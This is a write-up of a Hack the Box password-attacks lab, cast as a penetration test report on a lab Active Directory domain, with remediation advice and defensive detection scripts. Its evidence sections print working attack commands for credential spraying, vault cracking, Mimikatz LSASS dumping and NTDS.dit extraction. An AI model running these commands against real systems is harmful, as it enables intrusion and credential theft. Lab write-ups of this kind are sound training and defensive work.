I recently completed the “Password Attacks” module on the CPTS path on Hack the Box. Rather than a more “traditional” write-up, I decided to write this one in the context of a Penetration Test report.
Penetration Test Report
Password Attacks Skills Engagement — NEXURA.HTB Active Directory Environment
Table of Contents
- Executive Summary
- Scope & Environment
- Attack Chain Overview
- Detailed Findings
- F-001: Credentials Exposed in Bash History
- F-002: Sensitive Password Vault in Accessible Network Share
- F-003: Weak Password Vault Master Password
- F-004: Credential Reuse Across Domain Accounts
- F-005: Plaintext Credentials Recoverable via Mimikatz on JUMP01
- F-006: Domain Admin Compromise & NTDS.dit Dump
- Attack Vectors Attempted — No Result
- Credentials Recovered
- Recommendations
- Appendix — Tools Used
Executive Summary
A penetration test was conducted against the NEXURA.HTB Active Directory environment consisting of three internal Windows hosts (DC01, FILE01, JUMP01) and one Linux DMZ host. Beginning with initial SSH access to the DMZ host, the assessment achieved full domain compromise through an unbroken chain of credential exposure vulnerabilities.
The critical path to domain compromise required no exploitation of software vulnerabilities. Every step was achieved exclusively through credential mismanagement, plaintext secret exposure, and insecure administrative practices. The most impactful findings were:
- Plaintext SSH credentials stored in `.bash_history` on a DMZ host
- A password vault containing active domain user credentials stored in a world-readable SMB network share
- A trivially weak vault master password cracked in seconds via dictionary attack
- Plaintext credentials recoverable from LSASS memory on the domain jump box via Mimikatz
- A Domain Administrator account (stom) whose password was present in the exposed vault
The engagement concluded with a full dump of NTDS.dit from DC01, yielding the NT hashes of every account in the NEXURA.HTB domain, including NEXURA\Administrator.
Overall Risk Rating: CRITICAL
Scope & Environment
In-Scope Hosts
| Hostname | IP Address | OS | Role |
|---|---|---|---|
| DMZ01 | 10.129.x.x | Linux | DMZ Entry Point |
| JUMP01 | 172.16.119.7 | Windows Server | Internal Jump Box |
| FILE01 | 172.16.119.10 | Windows Server | Internal File Server |
| DC01 | 172.16.119.11 | Windows Server | Domain Controller |
Domain Information
| Field | Value |
|---|---|
| Domain Name | NEXURA.HTB |
| Domain Controller | DC01 (172.16.119.11) |
| Domain Users Identified | Administrator, hwilliam, bdavid, stom, krbtgt, Guest |
| Domain Admins | Administrator, stom |
Open Ports of Note
| Host | Port | Service |
|---|---|---|
| DMZ01 | 22 | SSH |
| JUMP01 | 445, 5985 | SMB, WinRM |
| FILE01 | 445, 3389, 5985 | SMB, RDP, WinRM |
| DC01 | 445, 5985 | SMB (Signing Enabled), WinRM |
Attack Chain Overview
[1] Initial Access — DMZ01
└─ SSH login via pre-provided credentials (jbetty)
│
▼
[2] F-001 — Bash History Credential Exposure — DMZ01
└─ Recovered plaintext domain credentials from .bash_history (sshpass command)
│
▼
[3] SMB Enumeration — FILE01 & DC01
└─ Authenticated to FILE01 (READ/WRITE: HR, PRIVATE, TRANSFER shares)
└─ Domain users enumerated from DC01: hwilliam, bdavid, stom, Administrator
│
▼
[4] F-002 / F-003 — Password Vault in HR Share
└─ FILE01\HR\Archive\Employee-Passwords_OLD.psafe3 discovered
└─ Vault master password cracked via John the Ripper (dictionary word)
└─ Three domain user credentials recovered from vault
│
▼
[5] F-004 — Credential Reuse — JUMP01
└─ Vault credentials valid on JUMP01 via WinRM (TCP/5985)
└─ Evil-WinRM shell obtained on JUMP01
│
▼
[6] LSASS Dump — JUMP01
└─ SAM hashes and DCC2 cached credentials dumped from LSASS
└─ [ATTEMPTED] Local admin Pass-the-Hash → FAILED
└─ [ATTEMPTED] Domain account Pass-the-Hash → FAILED
└─ [ATTEMPTED] DCC2 hash cracking → No result during engagement window
│
▼
[7] F-005 — Mimikatz Plaintext Credential Recovery — JUMP01
└─ sekurlsa::logonpasswords recovered Domain Admin plaintext password from LSASS
│
▼
[8] F-006 — DC01 Compromise & NTDS.dit Dump
└─ Evil-WinRM to DC01 as Domain Admin
└─ NTDS.dit extracted via Volume Shadow Copy
└─ impacket-secretsdump recovered all domain hashes
└─ NEXURA\Administrator NT hash obtained
└─ *** DOMAIN FULLY COMPROMISED ***
Detailed Findings
F-001: Credentials Exposed in Bash History
| Field | Detail |
|---|---|
| Severity | High |
| CVSS 3.1 Score | 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) |
| Host | DMZ01 |
| Location | /home/<user>/.bash_history |
| Discovery Method | Manual file review post SSH access |
Description
The .bash_history file on DMZ01 contained a previously executed sshpass command with domain credentials embedded directly in the command line:
sshpass -p "[REDACTED]" ssh hwilliam@file01
This is a common consequence of using credential-embedding tools such as sshpass in interactive shell sessions. Any process or user with read access to the home directory can recover these credentials trivially without any special tooling.
Impact
The recovered credentials provided authenticated SMB access to both FILE01 and DC01, and served as the initial foothold into the internal domain environment, directly enabling all subsequent findings.
Evidence
[Source]
DMZ01:/home/<user>/.bash_history
→ sshpass -p "[REDACTED]" ssh hwilliam@file01
[Validation]
crackmapexec smb 172.16.119.10 -u hwilliam -p [REDACTED]
→ SMB 172.16.119.10 445 FILE01 [+] NEXURA\hwilliam (authenticated)
crackmapexec smb 172.16.119.11 -u hwilliam -p [REDACTED]
→ SMB 172.16.119.11 445 DC01 [+] NEXURA\hwilliam (authenticated)
Remediation
- Never pass credentials as command-line arguments. Use SSH key-based authentication for host-to-host connections.
- Configure shell history to suppress credential-bearing commands: `HISTIGNORE='sshpass*:*password*'`
- Implement a secrets management solution (e.g., HashiCorp Vault) for service-to-service authentication.
- Audit all `.bash_history` files across DMZ and perimeter hosts for credential exposure.
- Rotate the affected user’s credentials immediately.
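As an added example (not code from the original report or the HTB module), a small Python audit script for the `.bash_history` review recommended above: it scans history files for credential-bearing commands such as the `sshpass -p` invocation behind this finding and reports each hit with the secret redacted. The rule list, the history file names and the sample history lines are constructed assumptions to be tuned per estate.

```python
"""Audit shell history files for commands that embed credentials (the F-001 pattern).
The rule list and the sample history lines are constructed assumptions; tune per estate."""
import re
from pathlib import Path
# Each rule captures the secret in group "secret" so the report can redact it.
CREDENTIAL_RULES = [
    ("sshpass -p", re.compile(r"\bsshpass\s+-p\s*(?P<q>[\"']?)(?P<secret>[^\s\"']+)(?P=q)")),
    ("--password", re.compile(r"--password[=\s]+(?P<q>[\"']?)(?P<secret>[^\s\"']+)(?P=q)")),
    ("cme/nxc -p", re.compile(r"\b(crackmapexec|cme|nxc)\b.*\s-p\s+(?P<q>[\"']?)(?P<secret>[^\s\"']+)(?P=q)")),
    ("PASSWORD= variable", re.compile(r"\b\w*PASS(WORD)?\w*=(?P<q>[\"']?)(?P<secret>[^\s\"']+)(?P=q)")),
]

def redact(line, match):
    """Replace only the captured secret so the rest of the command stays reviewable."""
    start, end = match.span("secret")
    return line[:start] + "[REDACTED]" + line[end:]

def scan_lines(lines, source="<memory>"):
    """Return one finding per history line that matches a credential rule."""
    findings = []
    for number, line in enumerate(lines, 1):
        line = line.rstrip("\n")
        for label, rule in CREDENTIAL_RULES:
            match = rule.search(line)
            if match:
                findings.append({"source": source, "line": number, "rule": label,
                                 "command": redact(line, match)})
                break  # one finding per line is enough for triage
    return findings

def scan_home_dirs(root="/home", names=(".bash_history", ".zsh_history", ".python_history")):
    """Walk every home directory under root and scan the history files found there."""
    root_path = Path(root)
    findings = []
    if not root_path.is_dir():
        return findings
    for hist in (home / name for home in root_path.iterdir() for name in names):
        try:
            with hist.open(errors="replace") as fh:
                findings.extend(scan_lines(fh, str(hist)))
        except OSError:  # missing file or no read permission: skip, do not abort the audit
            continue
    return findings

SAMPLE_HISTORY = [  # constructed lines modelled on the F-001 exposure
    "ls -la /opt",
    'sshpass -p "Hunter2Pass" ssh hwilliam@file01',
    "sshpass -f ~/.sshpass ssh hwilliam@file01",  # secret read from a file, not the command line: not flagged
    "crackmapexec smb 172.16.119.10 -u hwilliam -p 'Hunter2Pass' --shares",
    "mysql -u app --password=Sup3rS3cret -e 'select 1'",
    "export DB_PASSWORD=Sup3rS3cret",
]

if __name__ == "__main__":
    for f in scan_lines(SAMPLE_HISTORY, "sample") + scan_home_dirs():
        print(f"{f['source']}:{f['line']} [{f['rule']}] {f['command']}")
```

Run it as root on each DMZ and perimeter host (or point `scan_home_dirs` at a mounted image) and treat every hit as a credential to rotate, not merely a line to delete.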
F-002: Sensitive Password Vault in Accessible Network Share
| Field | Detail |
|---|---|
| Severity | Critical |
| CVSS 3.1 Score | 9.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) |
| Host | FILE01 (172.16.119.10) |
| Location | \\FILE01\HR\Archive\Employee-Passwords_OLD.psafe3 |
| Discovery Method | SMB share enumeration and recursive file listing |
Description
The HR SMB network share on FILE01 was accessible to all authenticated domain users with READ and WRITE permissions. Within the Archive subdirectory, a Password Safe v3 (.psafe3) vault file was discovered. This file contained valid, active plaintext credentials for multiple domain accounts once its master password was cracked (see F-003).
The share permissions were excessively permissive. Any domain user authenticated via SMB could download the vault file without any additional authorisation or auditing controls.
Observed Share Permissions
| Share | Access Level |
|---|---|
| HR | READ, WRITE |
| PRIVATE | READ, WRITE |
| TRANSFER | READ, WRITE |
| IT | NO ACCESS |
| MANAGEMENT | NO ACCESS |
| ADMIN$ | NO ACCESS |
| C$ | NO ACCESS |
Impact
The vault file yielded valid plaintext passwords for three active domain accounts. One of those accounts (stom) was a Domain Administrator. This single finding was the root cause of the domain compromise.
Evidence
# Share enumeration
crackmapexec smb 172.16.119.10 -u hwilliam -p [REDACTED] --shares
→ HR READ, WRITE
→ PRIVATE READ, WRITE
→ TRANSFER READ, WRITE
# Vault file discovery and download
smbclient //172.16.119.10/HR -U 'hwilliam%[REDACTED]' \
-c 'recurse ON; prompt OFF; mget *'
→ Downloaded: HR/Archive/Employee-Passwords_OLD.psafe3
Remediation
- Remove all password vault files from shared network storage immediately.
- Apply the principle of least privilege to all SMB shares. The HR share should not be accessible to every domain user.
- Implement and review SMB share access auditing to detect unauthorised access.
- Deploy an enterprise password manager (e.g., CyberArk, Bitwarden Business) rather than file-based vaults on shared infrastructure.
- Rotate all credentials contained within the recovered vault file.
F-003: Weak Password Vault Master Password
| Field | Detail |
|---|---|
| Severity | High |
| CVSS 3.1 Score | 7.5 (AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N) |
| Host | FILE01 — vault file origin |
| Tool Used | John the Ripper — dictionary attack |
| Wordlist | rockyou.txt |
| Time to Crack | Seconds |
Description
The Password Safe v3 vault recovered from the HR share was protected with a single dictionary word as its master password. This password is present in the rockyou.txt wordlist and was cracked near-instantly using John the Ripper.
Password Safe v3 uses PBKDF2-SHA256 with configurable iterations to protect the master key. Despite this cryptographic protection, a weak dictionary password rendered the entire vault trivially accessible to any attacker with the vault file.
Evidence
# Extract hash from vault file
pwsafe2john Employee-Passwords_OLD.psafe3 > vault.hash
# Dictionary attack
john vault.hash --wordlist=/usr/share/wordlists/rockyou.txt
# Result: Master password cracked (dictionary word)
Remediation
- Enforce a minimum master password length of 16 characters with mixed case, numbers, and symbols for all password vaults.
- A single dictionary word provides effectively zero resistance against offline dictionary attacks regardless of the underlying cryptographic algorithm.
- Consider enforcing organisation-wide passphrase complexity policies for all credential storage tools.
F-004: Credential Reuse Across Domain Accounts
| Field | Detail |
|---|---|
| Severity | High |
| CVSS 3.1 Score | 8.1 (AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N) |
| Host | JUMP01 (172.16.119.7) |
| Protocol | WinRM (TCP/5985) |
| Tool | Evil-WinRM |
Description
Credentials recovered from the password vault were tested against all in-scope hosts via SMB and WinRM. The account bdavid was found to have valid WinRM access to JUMP01, providing an interactive PowerShell session on the internal jump box.
The vault file was labelled _OLD, suggesting it was intended as an archive. However, all recovered passwords were current and valid Active Directory credentials at the time of the engagement, indicating no password rotation had occurred since the vault was archived.
Evidence
# Credential spray across all hosts
crackmapexec winrm 172.16.119.7 -u bdavid -p [REDACTED]
→ WINRM 172.16.119.7 5985 JUMP01 [+] NEXURA\bdavid (Pwn3d!)
# Evil-WinRM shell
proxychains evil-winrm -i 172.16.119.7 -u bdavid -p [REDACTED]
→ Evil-WinRM shell v3.3
→ *Evil-WinRM* PS C:\Users\bdavid\Documents>
Remediation
- Implement and enforce a password rotation policy. Archived vault credentials should have been rotated immediately upon archival.
- Enforce unique passwords across all systems using a managed privileged access workstation (PAW) model.
- Restrict WinRM access to administrative accounts only via Windows Firewall and WinRM Group Policy.
- Deploy credential hygiene monitoring to detect password reuse across accounts.
F-005: Plaintext Credentials Recoverable via Mimikatz on JUMP01
| Field | Detail |
|---|---|
| Severity | Critical |
| CVSS 3.1 Score | 9.1 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:N) |
| Host | JUMP01 (172.16.119.7) |
| Tool | Mimikatz — sekurlsa::logonpasswords |
| Prerequisite | Local Administrator access on JUMP01 |
Description
With local administrator access on JUMP01 (obtained via bdavid's WinRM session), Mimikatz was executed to enumerate credentials cached in LSASS memory. The sekurlsa::logonpasswords module recovered the plaintext password of stom, a Domain Administrator account, from LSASS memory.
Windows caches credentials in LSASS to support features such as network share access, RDP, and single sign-on. On systems where WDigest authentication is enabled (or where credentials have been entered interactively), plaintext passwords are retained in memory and can be extracted by any process with SeDebugPrivilege.
JUMP01’s role as a jump box made this especially impactful — privileged users regularly authenticate through it to reach other internal systems, making LSASS a high-value credential cache.
Evidence
mimikatz # privilege::debug
→ Privilege '20' OK
mimikatz # sekurlsa::logonpasswords
→ Authentication Id : [...]
→ Session : Interactive from 0
→ User Name : stom
→ Domain : NEXURA
→ Logon Server : DC01
→ SID : [...]
→ msv :
[00000003] Primary
* Username : stom
* Domain : NEXURA
* NTLM : [REDACTED]
* SHA1 : [REDACTED]
→ wdigest :
* Username : stom
* Domain : NEXURA
* Password : [REDACTED]
Remediation
- Enable Credential Guard on all domain-joined workstations and servers to protect LSASS from credential dumping.
- Disable WDigest authentication via registry: `HKLM\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest\UseLogonCredential = 0`
- Implement a tiered administration model — Domain Admin accounts should never authenticate to Tier 1 (member servers) or Tier 2 (workstations) systems.
- Deploy LSASS protection (RunAsPPL) to prevent unsigned code from accessing LSASS: `HKLM\SYSTEM\CurrentControlSet\Control\Lsa\RunAsPPL = 1`
- Consider deploying a Privileged Access Workstation (PAW) for all Domain Admin activities.
F-006: Domain Admin Compromise & NTDS.dit Dump
| Field | Detail |
|---|---|
| Severity | Critical |
| CVSS 3.1 Score | 10.0 (AV:N/AC:L/PR:H/UI:N/S:C/C:H/I:H/A:H) |
| Host | DC01 (172.16.119.11) |
| Tool | Evil-WinRM, impacket-secretsdump |
| Prerequisite | Domain Admin credentials (stom) |
Description
With Domain Admin credentials for stom recovered via Mimikatz (F-005), an Evil-WinRM session was established directly to DC01. The NTDS.dit Active Directory database was extracted using a Volume Shadow Copy, and impacket-secretsdump was used to recover all domain account NT hashes offline.
This represents complete domain compromise — every credential in the Active Directory environment was recovered, including the built-in NEXURA\Administrator account.
Evidence
# Domain Admin access to DC01
proxychains evil-winrm -i 172.16.119.11 -u stom -p [REDACTED]
→ Evil-WinRM shell on DC01
# NTDS.dit extraction via Volume Shadow Copy
vssadmin create shadow /for=C:
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\NTDS\NTDS.dit C:\tmp\ntds.dit
copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\Windows\System32\config\SYSTEM C:\tmp\system
# Offline hash extraction
impacket-secretsdump -ntds ntds.dit -system system LOCAL
→ NEXURA\Administrator:[REDACTED_HASH]
→ NEXURA\stom:[REDACTED_HASH]
→ NEXURA\hwilliam:[REDACTED_HASH]
→ NEXURA\bdavid:[REDACTED_HASH]
→ [... all domain accounts ...]
Remediation
- Implement the full remediation chain from F-001 through F-005 — this finding is the culmination of every prior finding.
- Perform a full domain password reset for all user and service accounts.
- Reset the KRBTGT account password twice (with a 12-hour interval) to invalidate all Kerberos tickets.
- Audit all Domain Admin and privileged group memberships. Remove unnecessary accounts from Domain Admins.
- Implement tiered administration to prevent lateral movement from compromised workstations to domain controllers.
- Deploy domain controller hardening: restrict logon rights, enable Advanced Audit Policies, and monitor for DCSync/NTDS.dit access.
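The monitoring items in the F-005 and F-006 remediation lists (LSASS credential dumping, NTDS.dit staged through a shadow copy on a domain controller) as added example detection logic, not code from the original report: two rules evaluated over constructed Sysmon-style Event ID 10 (ProcessAccess) and Event ID 1 (ProcessCreate) records. The allow-list, the source image paths and the sample events are assumptions; a real deployment would feed SIEM events into the same functions.

```python
"""Toy detection rules for the credential-theft steps in F-005 and F-006,
evaluated over constructed Sysmon-style events (a SIEM would supply real ones)."""
import re

PROCESS_VM_READ = 0x0010  # access right needed to read LSASS memory
# Processes expected to open lsass.exe on a hardened host (assumption: tune per estate).
LSASS_ALLOWLIST = {r"c:\windows\system32\csrss.exe", r"c:\windows\system32\wininit.exe"}
# Commands used to stage NTDS.dit: shadow-copy creation (as in F-006) or ntdsutil.
NTDS_STAGING = re.compile(r"\bvssadmin(\.exe)?\s+create\s+shadow\b|\bntdsutil\b", re.I)

def lsass_access_alert(ev):
    """Event ID 10: a non-allowlisted process requesting VM_READ on lsass.exe."""
    if ev.get("EventID") != 10:
        return None
    if ev["TargetImage"].lower() != r"c:\windows\system32\lsass.exe":
        return None
    granted = int(ev["GrantedAccess"], 16)
    if not granted & PROCESS_VM_READ or ev["SourceImage"].lower() in LSASS_ALLOWLIST:
        return None
    return f"LSASS read by {ev['SourceImage']} (access 0x{granted:x}) on {ev['Computer']}"

def ntds_staging_alert(ev, domain_controllers):
    """Event ID 1: shadow copy or ntdsutil invoked on a domain controller."""
    if ev.get("EventID") != 1 or ev["Computer"] not in domain_controllers:
        return None
    if not NTDS_STAGING.search(ev["CommandLine"]):
        return None
    return f"NTDS staging on DC {ev['Computer']} by {ev['User']}: {ev['CommandLine']}"

def triage(events, domain_controllers):
    """Run every rule over every event and return the alert strings in event order."""
    alerts = []
    for ev in events:
        for alert in (lsass_access_alert(ev), ntds_staging_alert(ev, domain_controllers)):
            if alert:
                alerts.append(alert)
    return alerts

SAMPLE_EVENTS = [  # constructed, mirroring the hosts and steps of this report
    {"EventID": 10, "Computer": "JUMP01", "SourceImage": r"C:\Users\bdavid\Documents\mimikatz.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1010"},
    {"EventID": 10, "Computer": "JUMP01", "SourceImage": r"C:\Windows\System32\csrss.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1fffff"},
    {"EventID": 10, "Computer": "FILE01", "SourceImage": r"C:\Windows\System32\taskmgr.exe",
     "TargetImage": r"C:\Windows\System32\lsass.exe", "GrantedAccess": "0x1000"},  # no VM_READ: benign
    {"EventID": 1, "Computer": "DC01", "User": r"NEXURA\stom", "CommandLine": "vssadmin create shadow /for=C:"},
    {"EventID": 1, "Computer": "FILE01", "User": r"NEXURA\hwilliam", "CommandLine": "vssadmin create shadow /for=C:"},
]

if __name__ == "__main__":
    for line in triage(SAMPLE_EVENTS, {"DC01"}):
        print(line)
```

The third sample shows why the access mask matters: many benign tools open lsass.exe with query-only rights, and alerting on every handle would drown the two real signals.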
Attack Vectors Attempted — No Result
A-001: Local Administrator Pass-the-Hash
Target: JUMP01 (172.16.119.7)
Technique: Pass-the-Hash with local Administrator NTLM hash recovered from SAM dump
Result: FAILED — UAC FilterAdministratorToken policy blocked remote access with the local Administrator hash.
A-002: DCC2 Hash Cracking
Target: Cached domain credentials from JUMP01 LSASS dump
Technique: DCC2 (Domain Cached Credentials v2) hash cracking with Hashcat
Result: No passwords recovered during the engagement window. DCC2 hashes use 10,240 rounds of PBKDF2-HMAC-SHA1, making offline cracking significantly slower than standard NTLM.
A-003: Domain Account Pass-the-Hash via SMB/WinRM
Target: DC01, FILE01
Technique: Pass-the-Hash using domain account NTLM hashes recovered from the SAM dump
Result: FAILED — The recovered domain user hashes did not have administrative access on any remote host. SMB and WinRM connections were rejected with STATUS_ACCESS_DENIED.
Credentials Recovered
Note: All credential values have been redacted from this report. Full credential data was provided to the client via a separate secure channel.
| Account | Source | Scope |
|---|---|---|
| jbetty | Pre-provided (engagement start) | DMZ01 SSH |
| hwilliam | .bash_history on DMZ01 | FILE01, DC01 (SMB) |
| bdavid | Password vault (HR share) | JUMP01 (WinRM) |
| stom (Domain Admin) | Password vault + Mimikatz | DC01, full domain access |
| All domain accounts | NTDS.dit dump from DC01 | Entire domain |
Recommendations
Immediate Actions (0–48 Hours)
- Reset all domain passwords — every user and service account must be rotated.
- Reset KRBTGT twice with a 12-hour interval to invalidate Kerberos tickets.
- Remove the password vault from the HR share on FILE01.
- Revoke and rotate all credentials recovered during the engagement.
- Audit `.bash_history` on all DMZ and perimeter hosts; purge exposed credentials.
Short-Term (1–4 Weeks)
- Restrict SMB share permissions — apply least privilege to HR, PRIVATE, and TRANSFER shares.
- Disable WDigest authentication on all domain-joined systems.
- Enable LSASS protection (RunAsPPL) and Credential Guard across the estate.
- Restrict WinRM access to authorised administrative accounts only.
- Implement a tiered administration model — Domain Admins must not authenticate to member servers or workstations.
Medium-Term (1–3 Months)
- Deploy an enterprise password manager (e.g., CyberArk, Bitwarden Business) to replace file-based vaults.
- Implement Privileged Access Workstations (PAWs) for all administrative activities.
- Enable Advanced Audit Policies on domain controllers to detect credential dumping and DCSync.
- Deploy a secrets management solution (e.g., HashiCorp Vault) for service-to-service authentication.
- Enforce password complexity and rotation policies across all accounts.
Appendix — Tools Used
| Tool | Purpose |
|---|---|
| NetExec | SMB/WinRM authentication spray & share enum |
| smbclient | SMB share browsing and file download |
| Evil-WinRM | WinRM interactive shell access |
| John the Ripper | Password vault master password cracking |
| pwsafe2john | Password Safe hash extraction |
| Mimikatz | LSASS credential dumping |
| impacket-secretsdump | NTDS.dit offline hash extraction |
| Nmap | Port scanning and service discovery |
| Proxychains | Traffic routing through pivot host |